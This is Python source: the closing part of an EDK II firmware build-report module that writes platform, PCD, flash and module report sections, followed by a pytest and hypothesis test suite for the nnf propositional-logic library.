    prediction (fixed address / execution order) and per-module sub-reports,
    depending on the requested ReportType items.
    """
    ##
    # Constructor function for class PlatformReport
    #
    # This constructor function generates PlatformReport object a platform build.
    # It generates report for platform summary, flash, global PCDs and detailed
    # module information for modules involved in platform build.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    # @param MaList          The list of modules in the platform build
    #
    def __init__(self, Wa, MaList, ReportType):
        self._WorkspaceDir = Wa.WorkspaceDir
        self.PlatformName = Wa.Name
        self.PlatformDscPath = Wa.Platform
        self.Architectures = " ".join(Wa.ArchList)
        self.ToolChain = Wa.ToolChain
        self.Target = Wa.BuildTarget
        self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
        self.BuildEnvironment = platform.platform()
        self.PcdReport = None
        if "PCD" in ReportType:
            self.PcdReport = PcdReport(Wa)
        self.FdReportList = []
        # Flash reports only apply to full platform builds (MaList is None)
        # that actually have an FDF profile.
        if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
            for Fd in Wa.FdfProfile.FdDict:
                self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
        self.PredictionReport = None
        if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
            self.PredictionReport = PredictionReport(Wa)
        self.DepexParser = None
        if "DEPEX" in ReportType:
            self.DepexParser = DepexParser(Wa)
        self.ModuleReportList = []
        # MaList is not None => module build: report only the given modules.
        # Otherwise collect every module of every platform AutoGen object,
        # including binary-only INFs referenced from the FDF.
        if MaList is not None:
            self._IsModuleBuild = True
            for Ma in MaList:
                self.ModuleReportList.append(ModuleReport(Ma, ReportType))
        else:
            self._IsModuleBuild = False
            for Pa in Wa.AutoGenObjectList:
                ModuleAutoGenList = []
                for ModuleKey in Pa.Platform.Modules:
                    ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
                if GlobalData.gFdfParser is not None:
                    if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
                        INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
                        for InfName in INFList:
                            InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
                            Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
                            if Ma is None:
                                continue
                            if Ma not in ModuleAutoGenList:
                                ModuleAutoGenList.append(Ma)
                for MGen in ModuleAutoGenList:
                    self.ModuleReportList.append(ModuleReport(MGen, ReportType))
    ##
    # Generate report for the whole platform.
    #
    # This function generates report for platform information.
    # It comprises of platform summary, global PCD, flash and
    # module list sections.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    # @param BuildDuration   The total time to build the modules
    # @param AutoGenTime     The total time of AutoGen Phase
    # @param MakeTime        The total time of Make Phase
    # @param GenFdsTime      The total time of GenFds Phase
    # @param ReportType      The kind of report items in the final report file
    #
    def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
        FileWrite(File, "Platform Summary")
        FileWrite(File, "Platform Name: %s" % self.PlatformName)
        FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
        FileWrite(File, "Architectures: %s" % self.Architectures)
        FileWrite(File, "Tool Chain: %s" % self.ToolChain)
        FileWrite(File, "Target: %s" % self.Target)
        if GlobalData.gSkuids:
            FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
        if GlobalData.gDefaultStores:
            FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
        FileWrite(File, "Output Path: %s" % self.OutputPath)
        FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
        FileWrite(File, "Build Duration: %s" % BuildDuration)
        if AutoGenTime:
            FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
        if MakeTime:
            FileWrite(File, "Make Duration: %s" % MakeTime)
        if GenFdsTime:
            FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
        FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
        if GlobalData.MixedPcd:
            FileWrite(File, gSectionStart)
            FileWrite(File, "The following PCDs use different access methods:")
            FileWrite(File, gSectionSep)
            for PcdItem in GlobalData.MixedPcd:
                FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
            FileWrite(File, gSectionEnd)
        # PCD and flash sections only appear for full platform builds.
        if not self._IsModuleBuild:
            if "PCD" in ReportType:
                self.PcdReport.GenerateReport(File, None)
            if "FLASH" in ReportType:
                for FdReportListItem in self.FdReportList:
                    FdReportListItem.GenerateReport(File)
        for ModuleReportItem in self.ModuleReportList:
            ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
        if not self._IsModuleBuild:
            if "EXECUTION_ORDER" in ReportType:
                self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
    """Collects build data and writes the formatted build report file.

    One BuildReport accumulates (Wa, MaList) pairs via AddPlatformReport()
    and renders them all in GenerateReport().  If no report file name was
    given, every operation is a no-op.
    """
    ##
    # Constructor function for class BuildReport
    #
    # @param self            The object pointer
    # @param ReportFile      The file name to save report file
    # @param ReportType      The kind of report items in the final report file
    #
    def __init__(self, ReportFile, ReportType):
        self.ReportFile = ReportFile
        if ReportFile:
            self.ReportList = []
            # De-duplicate the requested report types, preserving order;
            # fall back to the default set when none were requested.
            self.ReportType = []
            if ReportType:
                for ReportTypeItem in ReportType:
                    if ReportTypeItem not in self.ReportType:
                        self.ReportType.append(ReportTypeItem)
            else:
                self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
    ##
    # Adds platform report to the list
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    # @param MaList          The list of modules in the platform build
    #
    def AddPlatformReport(self, Wa, MaList=None):
        if self.ReportFile:
            self.ReportList.append((Wa, MaList))
    ##
    # Generates the final report.
    #
    # Invokes PlatformReport.GenerateReport() for every queued platform and
    # writes the combined, line-wrapped output to self.ReportFile.
    #
    # @param self            The object pointer
    # @param BuildDuration   The total time to build the modules
    # @param AutoGenTime     The total time of AutoGen phase
    # @param MakeTime        The total time of Make phase
    # @param GenFdsTime      The total time of GenFds phase
    #
    def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
        if self.ReportFile:
            try:
                # BUGFIX: BytesIO('') raises TypeError on Python 3 (the
                # initializer must be bytes); an empty buffer needs no
                # initializer at all.
                File = BytesIO()
                for (Wa, MaList) in self.ReportList:
                    PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
                Content = FileLinesSplit(File.getvalue(), gLineMaxLength)
                SaveFileOnChange(self.ReportFile, Content, True)
                EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
            except IOError:
                EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
            except:
                # Deliberately broad: report generation must never abort the
                # build, so log the traceback and continue.
                EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
                EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            File.close()
# This acts like the main() function for the script, unless it is 'import'ed
# into another script.  This module is import-only, so nothing runs here.
if __name__ == '__main__':
    pass
|
test_nnf.py | import copy
import pathlib
import pickle
import platform
import shutil
import threading
import types
import typing as t
import pytest
from hypothesis import (assume, event, given, strategies as st, settings,
HealthCheck)
import nnf
from nnf import (Var, And, Or, amc, dimacs, dsharp, operators,
tseitin, complete_models, config, pysat, all_models)
# --- module-level test setup ---------------------------------------------
# Disable write-back on every memoized NNF method so hypothesis runs do not
# pollute caches between examples (the lambda swallows .set() calls).
memoized = [
    method
    for method in vars(nnf.NNF).values()
    if isinstance(method, types.FunctionType) and hasattr(method, "memo")
]
assert memoized, "No memoized methods found, did the implementation change?"
for method in memoized:
    method.set = lambda *args: None  # type: ignore
# Relax hypothesis deadlines; some sentences are legitimately slow.
settings.register_profile('patient', deadline=2000,
                          suppress_health_check=(HealthCheck.too_slow,))
settings.load_profile('patient')
# Shared fixture sentences (fig1a/fig1b are the XOR examples from the
# Darwiche & Marquis knowledge-compilation paper figures).
a, b, c = Var('a'), Var('b'), Var('c')
fig1a = (~a & b) | (a & ~b)
fig1b = (~a | ~b) & (a | b)
# SATLIB benchmark fixtures loaded once at import time.
satlib = pathlib.Path(__file__).parent / "testdata" / "satlib"
uf20 = [dsharp.load(file.open()) for file in (satlib / "uf20").glob("*.nnf")]
uf20_cnf = [
    dimacs.load(file.open()) for file in (satlib / "uf20").glob("*.cnf")
]  # type: t.List[And[Or[Var]]]
# Test config default value before the tests start mucking with the state
assert config.sat_backend == "auto"
def test_all_models_basic():
    """Spot-check nnf.all_models on trivial variable collections."""
    assert list(nnf.all_models([])) == [{}]
    single = list(nnf.all_models([1]))
    assert single == [{1: False}, {1: True}]
    assert len(list(nnf.all_models(range(10)))) == 2 ** 10
# Property test: all_models enumerates exactly the 2**n complete assignments.
@given(st.sets(st.integers(), max_size=8))
def test_all_models(names):
    result = list(nnf.all_models(names))
    # Proper result size
    assert len(result) == 2**len(names)
    # Only real names, only booleans
    assert all(name in names and isinstance(value, bool)
               for model in result
               for name, value in model.items())
    # Only complete models
    assert all(len(model) == len(names)
               for model in result)
    # No duplicate models
    assert len({tuple(model.items()) for model in result}) == len(result)
def test_basic():
    """Exercise satisfied_by/satisfiable on small hand-built formulas."""
    assert a.satisfied_by({'a': True})
    assert (a | b).satisfied_by({'a': False, 'b': True})
    assert not (a & b).satisfied_by({'a': True, 'b': False})
    assert (a & b).satisfiable()
    assert not (a & ~a).satisfiable()
    assert not (a & (~a & b)).satisfiable()
    assert ((a | b) & (b | c)).satisfiable()
# Algebraic model counting: NUM_SAT counts models, GRAD returns (value, grad).
def test_amc():
    assert amc.NUM_SAT(fig1a) == 2
    assert amc.NUM_SAT(fig1b) == 4
    assert amc.GRAD(a, {'a': 0.5}, 'a') == (0.5, 1)
# --- hypothesis strategies for generating random sentences ----------------
# Variable names are small integers so generated sentences stay tractable.
names = st.integers(1, 8)
@st.composite
def variables(draw):
    # A single Var with a random polarity.
    return Var(draw(names), draw(st.booleans()))
@st.composite
def booleans(draw):
    return draw(st.sampled_from((nnf.true, nnf.false)))
@st.composite
def leaves(draw):
    return draw(st.one_of(variables(), booleans()))
@st.composite
def terms(draw):
    # A conjunction of literals over distinct names.
    return And(Var(name, draw(st.booleans()))
               for name in draw(st.sets(names)))
@st.composite
def clauses(draw):
    # A disjunction of literals over distinct names.
    return Or(Var(name, draw(st.booleans()))
              for name in draw(st.sets(names)))
@st.composite
def DNF(draw):
    return Or(draw(st.frozensets(terms())))
@st.composite
def CNF(draw):
    sentence = And(draw(st.frozensets(clauses())))
    return sentence
@st.composite
def models(draw):
    # One complete assignment expressed as a term.
    return And(
        Var(name, draw(st.booleans()))
        for name in range(1, draw(st.integers(min_value=1, max_value=9)))
    )
@st.composite
def MODS(draw):
    # A MODS sentence: a disjunction of complete terms over the same names.
    num = draw(st.integers(min_value=1, max_value=9))
    amount = draw(st.integers(min_value=0, max_value=10))
    return Or(And(Var(name, draw(st.booleans()))
                  for name in range(1, num))
              for _ in range(amount))
@st.composite
def internal(draw, children):
    return draw(st.sampled_from((And, Or)))(draw(st.frozensets(children)))
@st.composite
def NNF(draw):
    # Arbitrary NNF sentence built recursively from variables.
    return draw(st.recursive(variables(), internal))
@st.composite
def DNNF(draw):
    # Arbitrary NNF filtered down to decomposable sentences.
    sentence = draw(NNF())
    assume(sentence.decomposable())
    return sentence
# --- structural property tests on generated sentences ---------------------
@given(DNF())
def test_hyp(sentence: nnf.Or):
    assume(len(sentence.children) != 0)
    assume(sentence.decomposable())
    assert sentence.satisfiable()
    assert sentence.vars() <= set(range(1, 9))
@given(MODS())
def test_MODS(sentence: nnf.Or):
    assert sentence.smooth()
    assert sentence.flat()
    assert sentence.decomposable()
    assert sentence.simply_conjunct()
@given(MODS())
def test_MODS_satisfiable(sentence: nnf.Or):
    # An empty Or is unsatisfiable; any non-empty MODS has a model.
    if len(sentence.children) > 0:
        assert sentence.satisfiable()
    else:
        assert not sentence.satisfiable()
# Module-scoped fixture: runs each consuming test with and without node merging.
@pytest.fixture(scope='module', params=[True, False])
def merge_nodes(request):
    return request.param
@given(sentence=DNNF())
def test_DNNF_sat_strategies(sentence: nnf.NNF, merge_nodes):
    sat = sentence.satisfiable()
    if sat:
        assert sentence.simplify(merge_nodes) != nnf.false
        assert amc.SAT(sentence)
        event("Sentence satisfiable")
    else:
        assert sentence.simplify(merge_nodes) == nnf.false
        assert not amc.SAT(sentence)
        event("Sentence not satisfiable")
# --- simplification properties --------------------------------------------
def test_amc_numsat():
    # NUM_SAT on a smooth sentence equals the enumerated model count.
    for sentence in uf20:
        assert (amc.NUM_SAT(sentence.make_smooth())
                == len(list(sentence.models())))
@given(sentence=NNF())
def test_idempotent_simplification(sentence: nnf.NNF, merge_nodes):
    sentence = sentence.simplify(merge_nodes)
    assert sentence.simplify(merge_nodes) == sentence
@given(sentence=NNF())
def test_simplify_preserves_meaning(sentence: nnf.NNF, merge_nodes):
    simple = sentence.simplify(merge_nodes)
    assert sentence.equivalent(simple)
    for model in sentence.models():
        assert simple.satisfied_by(model)
    for model in simple.models():
        assert sentence.condition(model).simplify(merge_nodes) == nnf.true
@given(sentence=NNF())
def test_simplify_eliminates_bools(sentence: nnf.NNF, merge_nodes):
    # Unless the whole sentence collapses to a constant, no true/false
    # node may survive simplification.
    assume(sentence != nnf.true and sentence != nnf.false)
    if any(node == nnf.true or node == nnf.false
           for node in sentence.walk()):
        event("Sentence contained booleans originally")
    sentence = sentence.simplify(merge_nodes)
    if sentence == nnf.true or sentence == nnf.false:
        event("Sentence simplified to boolean")
    else:
        for node in sentence.walk():
            assert node != nnf.true and node != nnf.false
@given(NNF())
def test_simplify_merges_internal_nodes(sentence: nnf.NNF):
    if any(any(type(node) == type(child)
               for child in node.children)
           for node in sentence.walk()
           if isinstance(node, nnf.Internal)):
        event("Sentence contained immediately mergeable nodes")
    # Nodes may also be merged after intermediate nodes are removed
    for node in sentence.simplify().walk():
        if isinstance(node, nnf.Internal):
            for child in node.children:
                assert type(node) != type(child)
@given(sentence=DNNF())
def test_simplify_solves_DNNF_satisfiability(sentence: nnf.NNF, merge_nodes):
    if sentence.satisfiable():
        event("Sentence is satisfiable")
        assert sentence.simplify(merge_nodes) != nnf.false
    else:
        event("Sentence is not satisfiable")
        assert sentence.simplify(merge_nodes) == nnf.false
# --- DIMACS serialization round-trips --------------------------------------
def test_dimacs_sat_serialize():
    # http://www.domagoj-babic.com/uploads/ResearchProjects/Spear/dimacs-cnf.pdf
    sample_input = """c Sample SAT format
c
p sat 4
(*(+(1 3 -4)
+(4)
+(2 3)))
"""
    assert dimacs.loads(sample_input) == And({
        Or({Var(1), Var(3), ~Var(4)}),
        Or({Var(4)}),
        Or({Var(2), Var(3)})
    })
@pytest.mark.parametrize(
    'serialized, sentence',
    [
        ('p sat 2\n(+((1)+((2))))', Or({Var(1), Or({Var(2)})}))
    ]
)
def test_dimacs_sat_weird_input(serialized: str, sentence: nnf.NNF):
    assert dimacs.loads(serialized) == sentence
def test_dimacs_cnf_serialize():
    # Note the deliberately unusual layout: a clause terminated mid-line and
    # a final clause without a trailing 0.
    sample_input = """c Example CNF format file
c
p cnf 4 3
1 3 -4 0
4 0 2
-3
"""
    assert dimacs.loads(sample_input) == And({
        Or({Var(1), Var(3), ~Var(4)}),
        Or({Var(4)}),
        Or({Var(2), ~Var(3)})
    })
def test_dimacs_rejects_weird_digits():
    # Unicode superscript digits must not parse as variable numbers.
    with pytest.raises(dimacs.DecodeError):
        dimacs.loads("p cnf 1 1\n¹ 0")
@given(NNF())
def test_arbitrary_dimacs_sat_serialize(sentence: nnf.NNF):
    assert dimacs.loads(dimacs.dumps(sentence)) == sentence
    # Removing spaces may change the meaning, but shouldn't make it invalid
    # At least as far as our parser is concerned, a more sophisticated one
    # could detect variables with too high names
    serial = dimacs.dumps(sentence).split('\n')
    serial[1] = serial[1].replace(' ', '')
    dimacs.loads('\n'.join(serial))
@given(CNF())
def test_arbitrary_dimacs_cnf_serialize(sentence: And[Or[Var]]):
    reloaded = dimacs.loads(dimacs.dumps(sentence, mode='cnf'))
    assert reloaded.is_CNF()
    assert reloaded == sentence
@given(NNF())
def test_dimacs_cnf_serialize_accepts_only_cnf(sentence: nnf.NNF):
    if sentence.is_CNF():
        event("CNF sentence")
        dimacs.dumps(sentence, mode='cnf')
    else:
        event("Not CNF sentence")
        with pytest.raises(dimacs.EncodeError):
            dimacs.dumps(sentence, mode='cnf')
# --- SATLIB benchmark fixtures and DSHARP output --------------------------
@pytest.mark.parametrize(
    'fname, clauses',
    [
        ('bf0432-007.cnf', 3667),
        ('sw100-1.cnf', 3100),
        ('uuf250-01.cnf', 1065),
        ('uf20-01.cnf', 90),
    ]
)
def test_cnf_benchmark_data(fname: str, clauses: int):
    # Clause counts pinned to the known SATLIB benchmark contents.
    with (satlib / fname).open() as f:
        sentence = dimacs.load(f)
    assert isinstance(sentence, And) and len(sentence.children) == clauses
def test_dsharp_output():
    with (satlib / "uf20-01.nnf").open() as f:
        sentence = dsharp.load(f)
    with (satlib / "uf20-01.cnf").open() as f:
        clauses = dimacs.load(f)
    assert sentence.decomposable()
    # this is not a complete check, but clauses.models() is very expensive
    assert all(clauses.satisfied_by(model) for model in sentence.models())
@given(NNF())
def test_walk_unique_nodes(sentence: nnf.NNF):
    # walk() must yield each shared node exactly once.
    result = list(sentence.walk())
    assert len(result) == len(set(result))
    assert len(result) <= sentence.size() + 1
# --- model extraction, sizes and contradiction ----------------------------
@given(st.dictionaries(st.integers(), st.booleans()))
def test_to_model(model: dict):
    sentence = nnf.And(nnf.Var(k, v) for k, v in model.items())
    assert sentence.to_model() == model
@given(DNNF())
def test_models_deterministic_sanity(sentence: nnf.NNF):
    """Running _models_deterministic() on a non-deterministic decomposable
    sentence may return duplicate models but should not return unsatisfying
    models and should return each satisfying model at least once.
    """
    assert model_set(sentence._models_decomposable()) == model_set(
        sentence._models_deterministic()
    )
def test_models_deterministic_trivial():
    assert list(nnf.true._models_deterministic()) == [{}]
    assert list(nnf.false._models_deterministic()) == []
    assert list(a._models_deterministic()) == [{"a": True}]
@pytest.mark.parametrize(
    'sentence, size',
    [
        ((a & b), 2),
        (a & (a | b), 4),
        ((a | b) & (~a | ~b), 6),
        (And({
            Or({a, b}),
            And({a, Or({a, b})}),
        }), 6)
    ]
)
def test_size(sentence: nnf.NNF, size: int):
    # size() counts edges, with shared subtrees counted once.
    assert sentence.size() == size
@pytest.mark.parametrize(
    'a, b, contradictory',
    [
        (a, ~a, True),
        (a, b, False),
        (a, a, False),
        (a & b, a & ~b, True),
        (a & (a | b), b, False),
        (a & (a | b), ~a, True),
    ]
)
def test_contradicts(a: nnf.NNF, b: nnf.NNF, contradictory: bool):
    assert a.contradicts(b) == contradictory
# --- equivalence and smoothing --------------------------------------------
@given(NNF())
def test_false_contradicts_everything(sentence: nnf.NNF):
    assert nnf.false.contradicts(sentence)
@given(DNNF())
def test_equivalent(sentence: nnf.NNF):
    assert sentence.equivalent(sentence)
    assert sentence.equivalent(sentence | nnf.false)
    assert sentence.equivalent(sentence & (nnf.Var('A') | ~nnf.Var('A')))
    if sentence.satisfiable():
        assert not sentence.equivalent(sentence & nnf.false)
        assert not sentence.equivalent(sentence & nnf.Var('A'))
    else:
        # An unsatisfiable sentence is equivalent to anything conjoined to it.
        assert sentence.equivalent(sentence & nnf.false)
        assert sentence.equivalent(sentence & nnf.Var('A'))
@given(NNF(), NNF())
def test_random_equivalent(a: nnf.NNF, b: nnf.NNF):
    # Cross-check equivalent() against model enumeration, in both the
    # same-variable and different-variable cases.
    if a.vars() != b.vars():
        if a.equivalent(b):
            event("Equivalent, different vars")
            assert b.equivalent(a)
            for model in a.models():
                assert b.condition(model).valid()
            for model in b.models():
                assert a.condition(model).valid()
        else:
            event("Not equivalent, different vars")
            assert (any(not b.condition(model).valid()
                        for model in a.models()) or
                    any(not a.condition(model).valid()
                        for model in b.models()))
    else:
        if a.equivalent(b):
            event("Equivalent, same vars")
            assert b.equivalent(a)
            assert model_set(a.models()) == model_set(b.models())
        else:
            event("Not equivalent, same vars")
            assert model_set(a.models()) != model_set(b.models())
@given(NNF())
def test_smoothing(sentence: nnf.NNF):
    if not sentence.smooth():
        event("Sentence not smooth yet")
        smoothed = sentence.make_smooth()
        assert type(sentence) is type(smoothed)
        assert smoothed.smooth()
        assert sentence.equivalent(smoothed)
        assert smoothed.make_smooth() == smoothed
    else:
        event("Sentence already smooth")
        assert sentence.make_smooth() == sentence
def hashable_dict(model):
    """Freeze *model* into a hashable frozenset of (name, value) pairs."""
    return frozenset((name, value) for name, value in model.items())
def model_set(model_gen):
    """Collect an iterable of model dicts into a frozenset of frozen models."""
    return frozenset(frozenset(model.items()) for model in model_gen)
# Both model-enumeration strategies must agree on the uf20 benchmarks,
# and the decomposable path must not emit duplicates.
def test_uf20_models():
    for sentence in uf20:
        assert sentence.decomposable()
        m = list(sentence._models_decomposable())
        models = model_set(m)
        assert len(m) == len(models)
        assert models == model_set(sentence._models_deterministic())
def test_instantiating_base_classes_fails():
    """NNF and Internal are abstract and must refuse direct instantiation."""
    for construct in (
        lambda: nnf.NNF(),
        lambda: nnf.Internal(),
        lambda: nnf.Internal({nnf.Var(3)}),
    ):
        with pytest.raises(TypeError):
            construct()
# --- negation, counting, validity -----------------------------------------
@given(NNF())
def test_negation(sentence: nnf.NNF):
    # A sentence and its negation partition the 2**n assignment space.
    n_vars = len(sentence.vars())
    models_orig = model_set(sentence.models())
    models_negated = model_set(sentence.negate().models())
    assert len(models_orig) + len(models_negated) == 2**n_vars
    assert len(models_orig | models_negated) == 2**n_vars
@given(NNF())
def test_model_counting(sentence: nnf.NNF):
    assert sentence.model_count() == len(list(sentence.models()))
def test_uf20_model_counting():
    for sentence in uf20:
        # Exercise both the generic and the deterministic counting paths.
        nnf.NNF._deterministic_sentences.pop(id(sentence), None)
        assert sentence.model_count() == len(list(sentence.models()))
        sentence.mark_deterministic()
        assert sentence.model_count() == len(list(sentence.models()))
@given(NNF())
def test_validity(sentence: nnf.NNF):
    if sentence.valid():
        event("Valid sentence")
        assert all(sentence.satisfied_by(model)
                   for model in nnf.all_models(sentence.vars()))
    else:
        event("Invalid sentence")
        assert any(not sentence.satisfied_by(model)
                   for model in nnf.all_models(sentence.vars()))
def test_uf20_validity():
    for sentence in uf20:
        nnf.NNF._deterministic_sentences.pop(id(sentence), None)
        assert not sentence.valid()
        sentence.mark_deterministic()
        assert not sentence.valid()
# Every sentence produced by the CNF() strategy must classify as CNF.
@given(CNF())
def test_is_CNF(sentence: nnf.NNF):
    assert sentence.is_CNF()
    assert sentence.is_CNF(strict=True)
    assert not sentence.is_DNF()
def test_is_CNF_examples():
    """Hand-picked CNF shapes; strict mode rejects a clause mentioning
    the same variable in both polarities."""
    for sentence in (And(), And({Or()}), And({Or({a, ~b})})):
        assert sentence.is_CNF()
        assert sentence.is_CNF(strict=True)
    mixed = And({Or({a, ~b}), Or({c, ~c})})
    assert mixed.is_CNF()
    assert not mixed.is_CNF(strict=True)
# Every sentence produced by the DNF() strategy must classify as DNF.
@given(DNF())
def test_is_DNF(sentence: nnf.NNF):
    assert sentence.is_DNF()
    assert sentence.is_DNF(strict=True)
    assert not sentence.is_CNF()
def test_is_DNF_examples():
    """Hand-picked DNF shapes; strict mode rejects a term mentioning
    the same variable in both polarities."""
    for sentence in (Or(), Or({And()}), Or({And({a, ~b})})):
        assert sentence.is_DNF()
        assert sentence.is_DNF(strict=True)
    mixed = Or({And({a, ~b}), And({c, ~c})})
    assert mixed.is_DNF()
    assert not mixed.is_DNF(strict=True)
# --- MODS conversion, pairwise form, implicates/implicants ----------------
@given(NNF())
def test_to_MODS(sentence: nnf.NNF):
    assume(len(sentence.vars()) <= 5)
    mods = sentence.to_MODS()
    assert mods.is_MODS()
    assert mods.is_DNF()
    assert mods.is_DNF(strict=True)
    assert mods.smooth()
    assert isinstance(mods, Or)
    # In MODS form, each child is exactly one model.
    assert mods.model_count() == len(mods.children)
@given(MODS())
def test_is_MODS(sentence: nnf.NNF):
    assert sentence.is_MODS()
@given(NNF())
def test_pairwise(sentence: nnf.NNF):
    new = sentence.make_pairwise()
    assert new.equivalent(sentence)
    if new not in {nnf.true, nnf.false}:
        assert all(len(node.children) == 2
                   for node in new.walk()
                   if isinstance(node, nnf.Internal))
@given(NNF())
def test_implicates(sentence: nnf.NNF):
    # Result must be equivalent, strictly CNF, and contain no subsumed clause.
    implicates = sentence.implicates()
    assert implicates.equivalent(sentence)
    assert implicates.is_CNF(strict=True)
    assert not any(a.children < b.children
                   for a in implicates.children
                   for b in implicates.children)
@given(NNF())
def test_implicants(sentence: nnf.NNF):
    implicants = sentence.implicants()
    assert implicants.equivalent(sentence)
    assert implicants.is_DNF()
    assert not any(a.children < b.children
                   for a in implicants.children
                   for b in implicants.children)
@given(NNF())
def test_implicants_idempotent(sentence: nnf.NNF):
    assume(len(sentence.vars()) <= 6)
    implicants = sentence.implicants()
    implicates = sentence.implicates()
    assert implicants.implicants() == implicants
    assert implicates.implicants() == implicants
@given(NNF())
def test_implicates_implicants_negation_rule(sentence: nnf.NNF):
    """Any implicate is also a negated implicant of the negated sentence.
    .implicates() gives some implicates, and .implicants() gives all
    implicants.
    So sentence.negate().implicants().negate() gives all implicates,
    and sentence.negate().implicates().negate() gives some implicants.
    """
    assume(sentence.size() <= 30)
    assert (
        sentence.negate().implicants().negate().children
        >= sentence.implicates().children
    )
    assert (
        sentence.negate().implicates().negate().children
        <= sentence.implicants().children
    )
def test_implicates_implicants_negation_rule_example():
    """These failed an old version of the previous test. See issue #3."""
    sentence = Or({And({~Var(1), Var(2)}), And({~Var(3), Var(1)})})
    assert (
        sentence.negate().implicants().negate().children
        >= sentence.implicates().children
    )
    assert (
        sentence.negate().implicates().negate().children
        <= sentence.implicants().children
    )
# --- implication and derived operators ------------------------------------
@given(NNF(), NNF())
def test_implies(a: nnf.NNF, b: nnf.NNF):
    if a.implies(b):
        event("Implication")
        for model in a.models():
            assert b.condition(model).valid()
    else:
        event("No implication")
        assert any(not b.condition(model).valid()
                   for model in a.models())
def test_uf20_cnf_sat():
    for sentence in uf20_cnf:
        assert sentence.is_CNF()
        assert sentence.satisfiable()
        # It would be nice to compare .models() output to another algorithm
        # But even 20 variables is too much
        # So let's just hope that test_cnf_sat does enough
        at_least_one = False
        for model in sentence.models():
            assert sentence.satisfied_by(model)
            at_least_one = True
        assert at_least_one
@given(NNF(), NNF())
def test_xor(a: nnf.NNF, b: nnf.NNF):
    c = operators.xor(a, b)
    for model in nnf.all_models(c.vars()):
        # N.B. '==' binds tighter than '^', so this reads A ^ (B == C);
        # for booleans that is logically the same as (A ^ B) == C.
        assert (a.satisfied_by(model) ^ b.satisfied_by(model) ==
                c.satisfied_by(model))
@given(NNF(), NNF())
def test_nand(a: nnf.NNF, b: nnf.NNF):
    c = operators.nand(a, b)
    for model in nnf.all_models(c.vars()):
        assert ((a.satisfied_by(model) and b.satisfied_by(model)) !=
                c.satisfied_by(model))
@given(NNF(), NNF())
def test_nor(a: nnf.NNF, b: nnf.NNF):
    c = operators.nor(a, b)
    for model in nnf.all_models(c.vars()):
        assert ((a.satisfied_by(model) or b.satisfied_by(model)) !=
                c.satisfied_by(model))
@given(NNF(), NNF())
def test_implies2(a: nnf.NNF, b: nnf.NNF):
    c = operators.implies(a, b)
    for model in nnf.all_models(c.vars()):
        assert ((a.satisfied_by(model) and not b.satisfied_by(model)) !=
                c.satisfied_by(model))
@given(NNF(), NNF())
def test_implied_by(a: nnf.NNF, b: nnf.NNF):
    c = operators.implied_by(a, b)
    for model in nnf.all_models(c.vars()):
        assert ((b.satisfied_by(model) and not a.satisfied_by(model)) !=
                c.satisfied_by(model))
@given(NNF(), NNF())
def test_iff(a: nnf.NNF, b: nnf.NNF):
    c = operators.iff(a, b)
    for model in nnf.all_models(c.vars()):
        assert ((a.satisfied_by(model) == b.satisfied_by(model)) ==
                c.satisfied_by(model))
# --- forgetting, projection, pickling, copying ----------------------------
@given(NNF())
def test_forget(sentence: nnf.NNF):
    # Assumption to reduce the time in testing
    assume(sentence.size() <= 15)
    # Test that forgetting a backbone variable doesn't change the theory
    T = sentence & Var('added_var')
    assert sentence.equivalent(T.forget({'added_var'}))
    # Test the tseitin projection
    assert sentence.equivalent(sentence.to_CNF().forget_aux())
    # Test that models of a projected theory are consistent with the original
    names = list(sentence.vars())[:2]
    T = sentence.forget(names)
    assert not any([v in T.vars() for v in names])
    for m in T.models():
        assert sentence.condition(m).satisfiable()
@given(NNF())
def test_project(sentence: nnf.NNF):
    # Test that we get the same as projecting and forgetting
    assume(len(sentence.vars()) > 3)
    vars1 = list(sentence.vars())[:2]
    vars2 = list(sentence.vars())[2:]
    assert sentence.forget(vars1).equivalent(sentence.project(vars2))
@given(NNF())
def test_pickling(sentence: nnf.NNF):
    # Round-trip must preserve equality and internal node sharing.
    new = pickle.loads(pickle.dumps(sentence))
    assert sentence == new
    assert sentence is not new
    assert sentence.object_count() == new.object_count()
@given(NNF())
def test_copying_does_not_copy(sentence: nnf.NNF):
    # Sentences are immutable, so copy/deepcopy return the same object.
    assert sentence is copy.copy(sentence) is copy.deepcopy(sentence)
    assert copy.deepcopy([sentence])[0] is sentence
# These tests shell out to the external dsharp compiler; only define them
# when the binary is available on PATH.
